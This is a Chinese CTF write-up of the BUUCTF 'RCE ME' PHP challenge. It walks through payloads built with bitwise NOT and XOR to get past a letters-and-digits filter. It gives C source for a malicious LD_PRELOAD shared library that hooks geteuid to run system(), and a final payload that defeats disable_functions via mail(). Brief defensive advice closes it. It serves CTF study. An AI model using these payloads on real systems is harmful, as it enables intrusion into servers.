当前位置: 首页 > article >正文

BUUCTF:[极客大挑战 2019]RCE ME 深度解析:从正则绕开到LD_PRELOAD的完整利用链

1. 题目背景与初步分析BUUCTF的[极客大挑战 2019]RCE ME是一道典型的PHP代码审计与绕过题目。题目给出了一个简单的PHP页面核心代码如下?php error_reporting(0); if(isset($_GET[code])){ $code$_GET[code]; if(strlen($code)40){ die(太长了); } if(preg_match(/[A-Za-z0-9]/,$code)){ die(太简单了); } eval($code); } else{ highlight_file(__FILE__); } ?这段代码有几个关键限制输入的code参数长度不能超过40个字符不能包含任何字母和数字最终会通过eval执行我们的输入面对这样的限制常规的RCE方法基本都被堵死了。我们需要找到一种既不需要字母数字又足够简洁的payload构造方式。2. 绕过正则限制2.1 取反编码绕过原理PHP中有一个非常有趣的特性通过取反运算符(~)和URL编码可以构造出完全不包含字母数字的payload。具体原理是PHP允许使用~对字符串进行按位取反操作取反后的字符串可以通过urlencode编码最终得到的是一串百分号开头的编码完全符合题目要求举个例子要执行phpinfo()我们可以这样做php -r echo urlencode(~phpinfo); # 输出%8F%97%8F%96%91%99%90然后构造payload?code(~%8F%97%8F%96%91%99%90)();这个payload完全避开了字母数字检测长度也符合要求。2.2 其他绕过方法对比除了取反编码还有几种常见的绕过方式异或运算通过字符间的异或运算生成所需函数名自增技巧利用PHP的类型转换特性字符串拼接通过.运算符组合特殊字符但在本题中由于长度限制取反编码是最优解。我实测过其他方法要么长度超标要么构造过于复杂。3. 分析disable_functions限制成功执行phpinfo()后我们发现服务器配置了严格的disable_functionspcntl_alarm, pcntl_fork, ..., system, exec, shell_exec, popen, proc_open, passthru, ...基本上所有能直接执行系统命令的函数都被禁用了。这意味着即使我们拿到了webshell也无法直接执行系统命令。这种情况下我们需要寻找不依赖这些函数的RCE方法。经过分析发现以下几个突破口LD_PRELOAD环境变量劫持PHP FFI扩展如果启用ImageMagick漏洞如果安装其中LD_PRELOAD是最可靠的方案因为它不依赖任何PHP函数只需要能上传文件和执行PHP代码在Linux系统上普遍可用4. LD_PRELOAD利用详解4.1 原理剖析LD_PRELOAD是Linux系统的一个环境变量它可以指定在程序运行前优先加载的动态链接库。我们可以利用这个特性编写一个恶意.so文件定义一些关键函数的替代实现通过LD_PRELOAD让目标程序加载我们的.so当目标程序调用这些函数时实际执行的是我们的代码关键在于PHP的mail()函数会隐式调用外部程序sendmail这就给了我们注入的机会。4.2 实际操作步骤首先准备一个恶意的C代码// bypass_disablefunc.c #include stdlib.h #include stdio.h #include string.h void payload() { const char* cmd getenv(CMD); system(cmd); } int geteuid() { if (getenv(LD_PRELOAD) NULL) { return 0; } unsetenv(LD_PRELOAD); payload(); }编译为共享库gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so上传.so文件到服务器本题中/var/tmp可写构造最终的payload?code${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);_assert__include(/var/tmp/shell.php)cmd/readflagoutpath/tmp/tmpfilesopath/var/tmp/bypass_disablefunc_x64.so这个payload做了以下几件事使用取反编码绕过初始限制包含一个特制的PHP脚本设置CMD环境变量为/readflag指定.so文件路径5. 完整利用链总结回顾整个利用过程可以分为四个关键阶段代码审计分析题目给出的PHP代码理解限制条件正则绕过使用取反编码技术构造无字母数字的payload环境侦察通过phpinfo()获取服务器配置信息权限突破利用LD_PRELOAD绕过disable_functions限制在实际渗透测试中这种层层递进的思路非常实用。每个环节都需要考虑多种可能性并选择最合适的绕过方法。6. 防御建议从防御角度可以采取以下措施避免直接使用eval执行用户输入使用白名单而非黑名单过滤特殊字符限制上传目录的执行权限定期更新PHP版本修复已知漏洞使用SELinux等强制访问控制机制这道题很好地展示了安全防护的深度防御原则 - 即使突破了第一道防线后面还应该有其他防护措施。

相关文章:

BUUCTF:[极客大挑战 2019]RCE ME 深度解析:从正则绕开到LD_PRELOAD的完整利用链

1. 题目背景与初步分析 BUUCTF的[极客大挑战 2019]RCE ME是一道典型的PHP代码审计与绕过题目。题目给出了一个简单的PHP页面&#xff0c;核心代码如下&#xff1a; <?php error_reporting(0); if(isset($_GET[code])){$code$_GET[code];if(strlen($code)>40){die(&quo…...

如何快速提取Unity游戏素材:AssetStudio完整使用指南

如何快速提取Unity游戏素材&#xff1a;AssetStudio完整使用指南 【免费下载链接】AssetStudio AssetStudio - Based on the archived Perfares AssetStudio, I continue Perfares work to keep AssetStudio up-to-date, with support for new Unity versions and additional i…...

“社恐”技术大牛周志明的写作哲学:如何像他一样,用开源文档和博客打造个人技术品牌

“社恐”技术大牛的写作哲学&#xff1a;用开源与博客构建个人技术品牌 在技术圈里&#xff0c;有这样一群人&#xff1a;他们不善言辞&#xff0c;却能用代码和文字征服同行&#xff1b;他们回避社交&#xff0c;却在GitHub和博客上拥有大批追随者。这类"社恐"技术大…...

LinkSwift:如何让网盘下载从龟速到光速?这款工具给出了答案

LinkSwift&#xff1a;如何让网盘下载从龟速到光速&#xff1f;这款工具给出了答案 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 &#xff0c;支持 百度网盘 / 阿里云盘 / 中国…...

如何快速掌握思源宋体:7种免费商用字体让你的设计瞬间专业

如何快速掌握思源宋体&#xff1a;7种免费商用字体让你的设计瞬间专业 【免费下载链接】source-han-serif-ttf Source Han Serif TTF 项目地址: https://gitcode.com/gh_mirrors/so/source-han-serif-ttf 还在为中文排版设计而烦恼吗&#xff1f;你是否曾经在寻找既美观…...

GetQzonehistory:5分钟免费备份你的QQ空间青春回忆

GetQzonehistory&#xff1a;5分钟免费备份你的QQ空间青春回忆 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 还在担心那些承载青春记忆的QQ空间说说会随着时间消失吗&#xff1f;GetQ…...

程序员转大模型,这8个必备框架,新手也能快速落地项目

文章目录前言1. LangChain 2026&#xff1a;AI应用开发的"事实标准"&#xff0c;新手入门绕不开1.1 大白话理解LangChain1.2 2026年核心更新亮点1.3 新手快速上手代码示例1.4 避坑指南2. LlamaIndex&#xff1a;RAG专属神器&#xff0c;知识库搭建就靠它2.1 大白话理…...

Anylogic建模效率翻倍秘诀:活用‘智能体类型’实现模块化设计与复用

Anylogic建模效率翻倍秘诀&#xff1a;活用‘智能体类型’实现模块化设计与复用 在复杂系统仿真领域&#xff0c;Anylogic凭借其多方法建模能力已成为工业级解决方案的首选工具。但当我们面对包含数百个交互实体的产线仿真时&#xff0c;传统逐个创建智能体的方式不仅效率低下&…...

ECharts地图可视化踩坑实录:从GeoJSON数据获取到本地开发跨域问题的全链路解决

ECharts地图可视化实战指南&#xff1a;从数据获取到跨域问题解决的全流程解析 地图可视化是现代数据展示的重要手段之一&#xff0c;而ECharts作为国内最流行的可视化库之一&#xff0c;其地图功能被广泛应用于各类项目中。但在实际开发过程中&#xff0c;从数据获取到最终呈现…...

Vivado里用OSERDESE2+OBUFDS实现LVDS输出,一个完整可复用的Verilog模块(含XDC约束)

Vivado中LVDS输出的工程化实现&#xff1a;OSERDESE2与OBUFDS的模块化封装 在高速数字电路设计中&#xff0c;LVDS&#xff08;低压差分信号&#xff09;因其抗干扰能力强、功耗低、传输速率高等优势&#xff0c;已成为FPGA与外部器件通信的重要接口标准。对于Xilinx FPGA开发者…...

编程应届生面试,HR最常问的20个问题,高分答案都在这里

文章目录前言一、自我认知类&#xff1a;HR想知道你是不是“对的人”问题1&#xff1a;请你做一个3分钟的自我介绍问题2&#xff1a;你最大的优点和缺点是什么&#xff1f;问题3&#xff1a;你为什么选择这个专业/行业&#xff1f;二、职业规划类&#xff1a;看你能不能在公司待…...

Transformer架构优化实战2026:注意力机制、KV Cache与推理加速完整指南

Transformer架构诞生已近十年&#xff0c;但它的工程优化故事才刚刚开始。2026年&#xff0c;理解并掌握Transformer的核心优化技术&#xff0c;是每个LLM工程师的必修课。一、为什么Transformer的优化如此重要一个7B参数的LLM在A100上推理时&#xff0c;如果没有优化&#xff…...

对比自行维护多个API密钥,Taotoken的密钥管理与审计日志更省心

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 对比自行维护多个API密钥&#xff0c;Taotoken的密钥管理与审计日志更省心 在构建基于大模型的应用时&#xff0c;项目管理者常常需…...

从选型到调试:MCP2517FD与ATA6563收发器搭配实战避坑指南

从选型到调试&#xff1a;MCP2517FD与ATA6563收发器搭配实战避坑指南 在工业控制和车载电子系统中&#xff0c;CAN FD总线技术正逐步取代传统CAN总线&#xff0c;成为高速数据传输的新标准。作为硬件工程师&#xff0c;我们常常面临这样的挑战&#xff1a;如何在有限的项目周期…...

别再只配防火墙了!华为USG+交换机联动配置实战:让内网用户顺利上网的完整闭环

华为USG防火墙与交换机联动配置&#xff1a;构建企业内网安全上网的完整方案 当企业内网用户反馈无法访问互联网时&#xff0c;很多网络工程师的第一反应是检查防火墙配置。然而&#xff0c;真实情况往往是防火墙只是整个网络出口链条中的一环。本文将从一个完整的网络架构视角…...

观察不同时段调用Taotoken多模型API的延迟波动情况

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 观察不同时段调用Taotoken多模型API的延迟波动情况 在构建依赖大模型能力的应用时&#xff0c;服务的响应延迟是一个直接影响用户体…...

5分钟掌握LayerDivider:AI图像分层工具终极指南

5分钟掌握LayerDivider&#xff1a;AI图像分层工具终极指南 【免费下载链接】layerdivider A tool to divide a single illustration into a layered structure. 项目地址: https://gitcode.com/gh_mirrors/la/layerdivider 你是否曾经面对复杂的插画作品&#xff0c;花…...

WeChatMsg完整指南:如何永久保存并深度分析你的微信聊天记录

WeChatMsg完整指南&#xff1a;如何永久保存并深度分析你的微信聊天记录 【免费下载链接】WeChatMsg 提取微信聊天记录&#xff0c;将其导出成HTML、Word、CSV文档永久保存&#xff0c;对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Trending/we…...

【管理科学】【财务领域】第四十九篇 企业资本通过金融工具获取资本与通过制造舆论冲突吸引注意力01

企业资本运作与注意力经济融合模型分析 本模型旨在揭示企业如何将金融资本杠杆与注意力经济策略相结合,以实现资本扩张与用户习惯的深度绑定。 编号 类型 企业资本注意力经济和长期购买/消费习惯培养模型 逐步推理思考的方程式 时序数学方程式 交互周期和交互流程的数学…...

30_AI短片实战第三弹:头盔一致性、连续动作推导与情绪特写叠加(附提示词)

文章目录 一、锁定造型:为角色建立“三视图”头盔参考 问题诊断 解决方案:角色三视图思路 二、连续动作推导:从一张图“衍生”出下一帧 工作流创新 具体操作 效果 适用场景 三、怪兽摔落镜头:场景切换中的叙事连续性 镜头设定 关键调整点 生成结果 四、情绪特写:瞳孔与面罩…...

OpenClaw用户迁移至Taotoken平台的具体配置步骤详解

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 OpenClaw用户迁移至Taotoken平台的具体配置步骤详解 如果你正在使用OpenClaw这类Agent框架&#xff0c;并希望将后端模型服务切换至…...

告别虚拟机卡顿:在Windows 11的WSL2里为树莓派4B编译Automotive Grade Linux镜像

告别虚拟机卡顿&#xff1a;在Windows 11的WSL2里为树莓派4B编译Automotive Grade Linux镜像 嵌入式开发者在Windows平台上常面临一个尴尬处境&#xff1a;项目需要Linux环境&#xff0c;但物理机切换或虚拟机性能损耗让人头疼。去年我在为某车载HMI项目构建AGL镜像时&#xff…...

Unity UGUI点击事件避坑指南:为什么你的Image点了没反应?

Unity UGUI点击事件避坑指南&#xff1a;为什么你的Image点了没反应&#xff1f; 当你信心满满地在Unity中为Image组件添加了IPointerClickHandler接口&#xff0c;点击运行时却发现无论如何点击屏幕都没有反应——这种挫败感每个Unity开发者都经历过。本文将深入剖析UGUI事件系…...

3分钟快速上手:免费AI语音修复工具VoiceFixer终极指南 [特殊字符]

3分钟快速上手&#xff1a;免费AI语音修复工具VoiceFixer终极指南 &#x1f3a4; 【免费下载链接】voicefixer General Speech Restoration 项目地址: https://gitcode.com/gh_mirrors/vo/voicefixer 你是否曾经因为录音质量不佳而烦恼&#xff1f;会议录音充满杂音、珍…...

Windows与Office终极激活指南:KMS_VL_ALL_AIO智能脚本免费解决方案

Windows与Office终极激活指南&#xff1a;KMS_VL_ALL_AIO智能脚本免费解决方案 【免费下载链接】KMS_VL_ALL_AIO Smart Activation Script 项目地址: https://gitcode.com/gh_mirrors/km/KMS_VL_ALL_AIO 还在为系统激活烦恼吗&#xff1f;KMS_VL_ALL_AIO智能激活脚本为您…...

Diablo Edit2深度解析:技术架构与安全使用的暗黑2存档编辑完全手册

Diablo Edit2深度解析&#xff1a;技术架构与安全使用的暗黑2存档编辑完全手册 【免费下载链接】diablo_edit Diablo II Character editor. 项目地址: https://gitcode.com/gh_mirrors/di/diablo_edit Diablo Edit2是一款功能强大的开源暗黑破坏神2存档编辑器&#xff0…...

为Claude Code配置Taotoken解决密钥被封与Token不足痛点

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 为Claude Code配置Taotoken解决密钥被封与Token不足痛点 对于经常使用Claude Code进行开发的工程师来说&#xff0c;直接使用官方服…...

为团队统一开发环境利用Taotoken CLI一键配置多模型密钥

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 为团队统一开发环境利用Taotoken CLI一键配置多模型密钥 在团队协作开发中&#xff0c;一个常见的挑战是如何统一管理AI模型调用的…...

BooruDatasetTagManager:AI训练数据标注效率提升10倍的智能解决方案

BooruDatasetTagManager&#xff1a;AI训练数据标注效率提升10倍的智能解决方案 【免费下载链接】BooruDatasetTagManager 项目地址: https://gitcode.com/gh_mirrors/bo/BooruDatasetTagManager 在AI模型训练领域&#xff0c;数据标注的质量直接决定了模型的最终表现。…...

【C语言】16 位的值,通过几种不同的方式将其拆分为高 8 位和低 8 位

当我们想要将一个16位的 Register_Value 拆分成高8位和低8位&#xff0c;并存储到 Send_Data_Uart5 数组中时&#xff0c;有几种常见的方法可以实现。让我们逐一优化和详细分析每种方法&#xff1a;方法 1: 使用位移和位掩码&#xff08;常用方法&#xff09;代码语言&#xff…...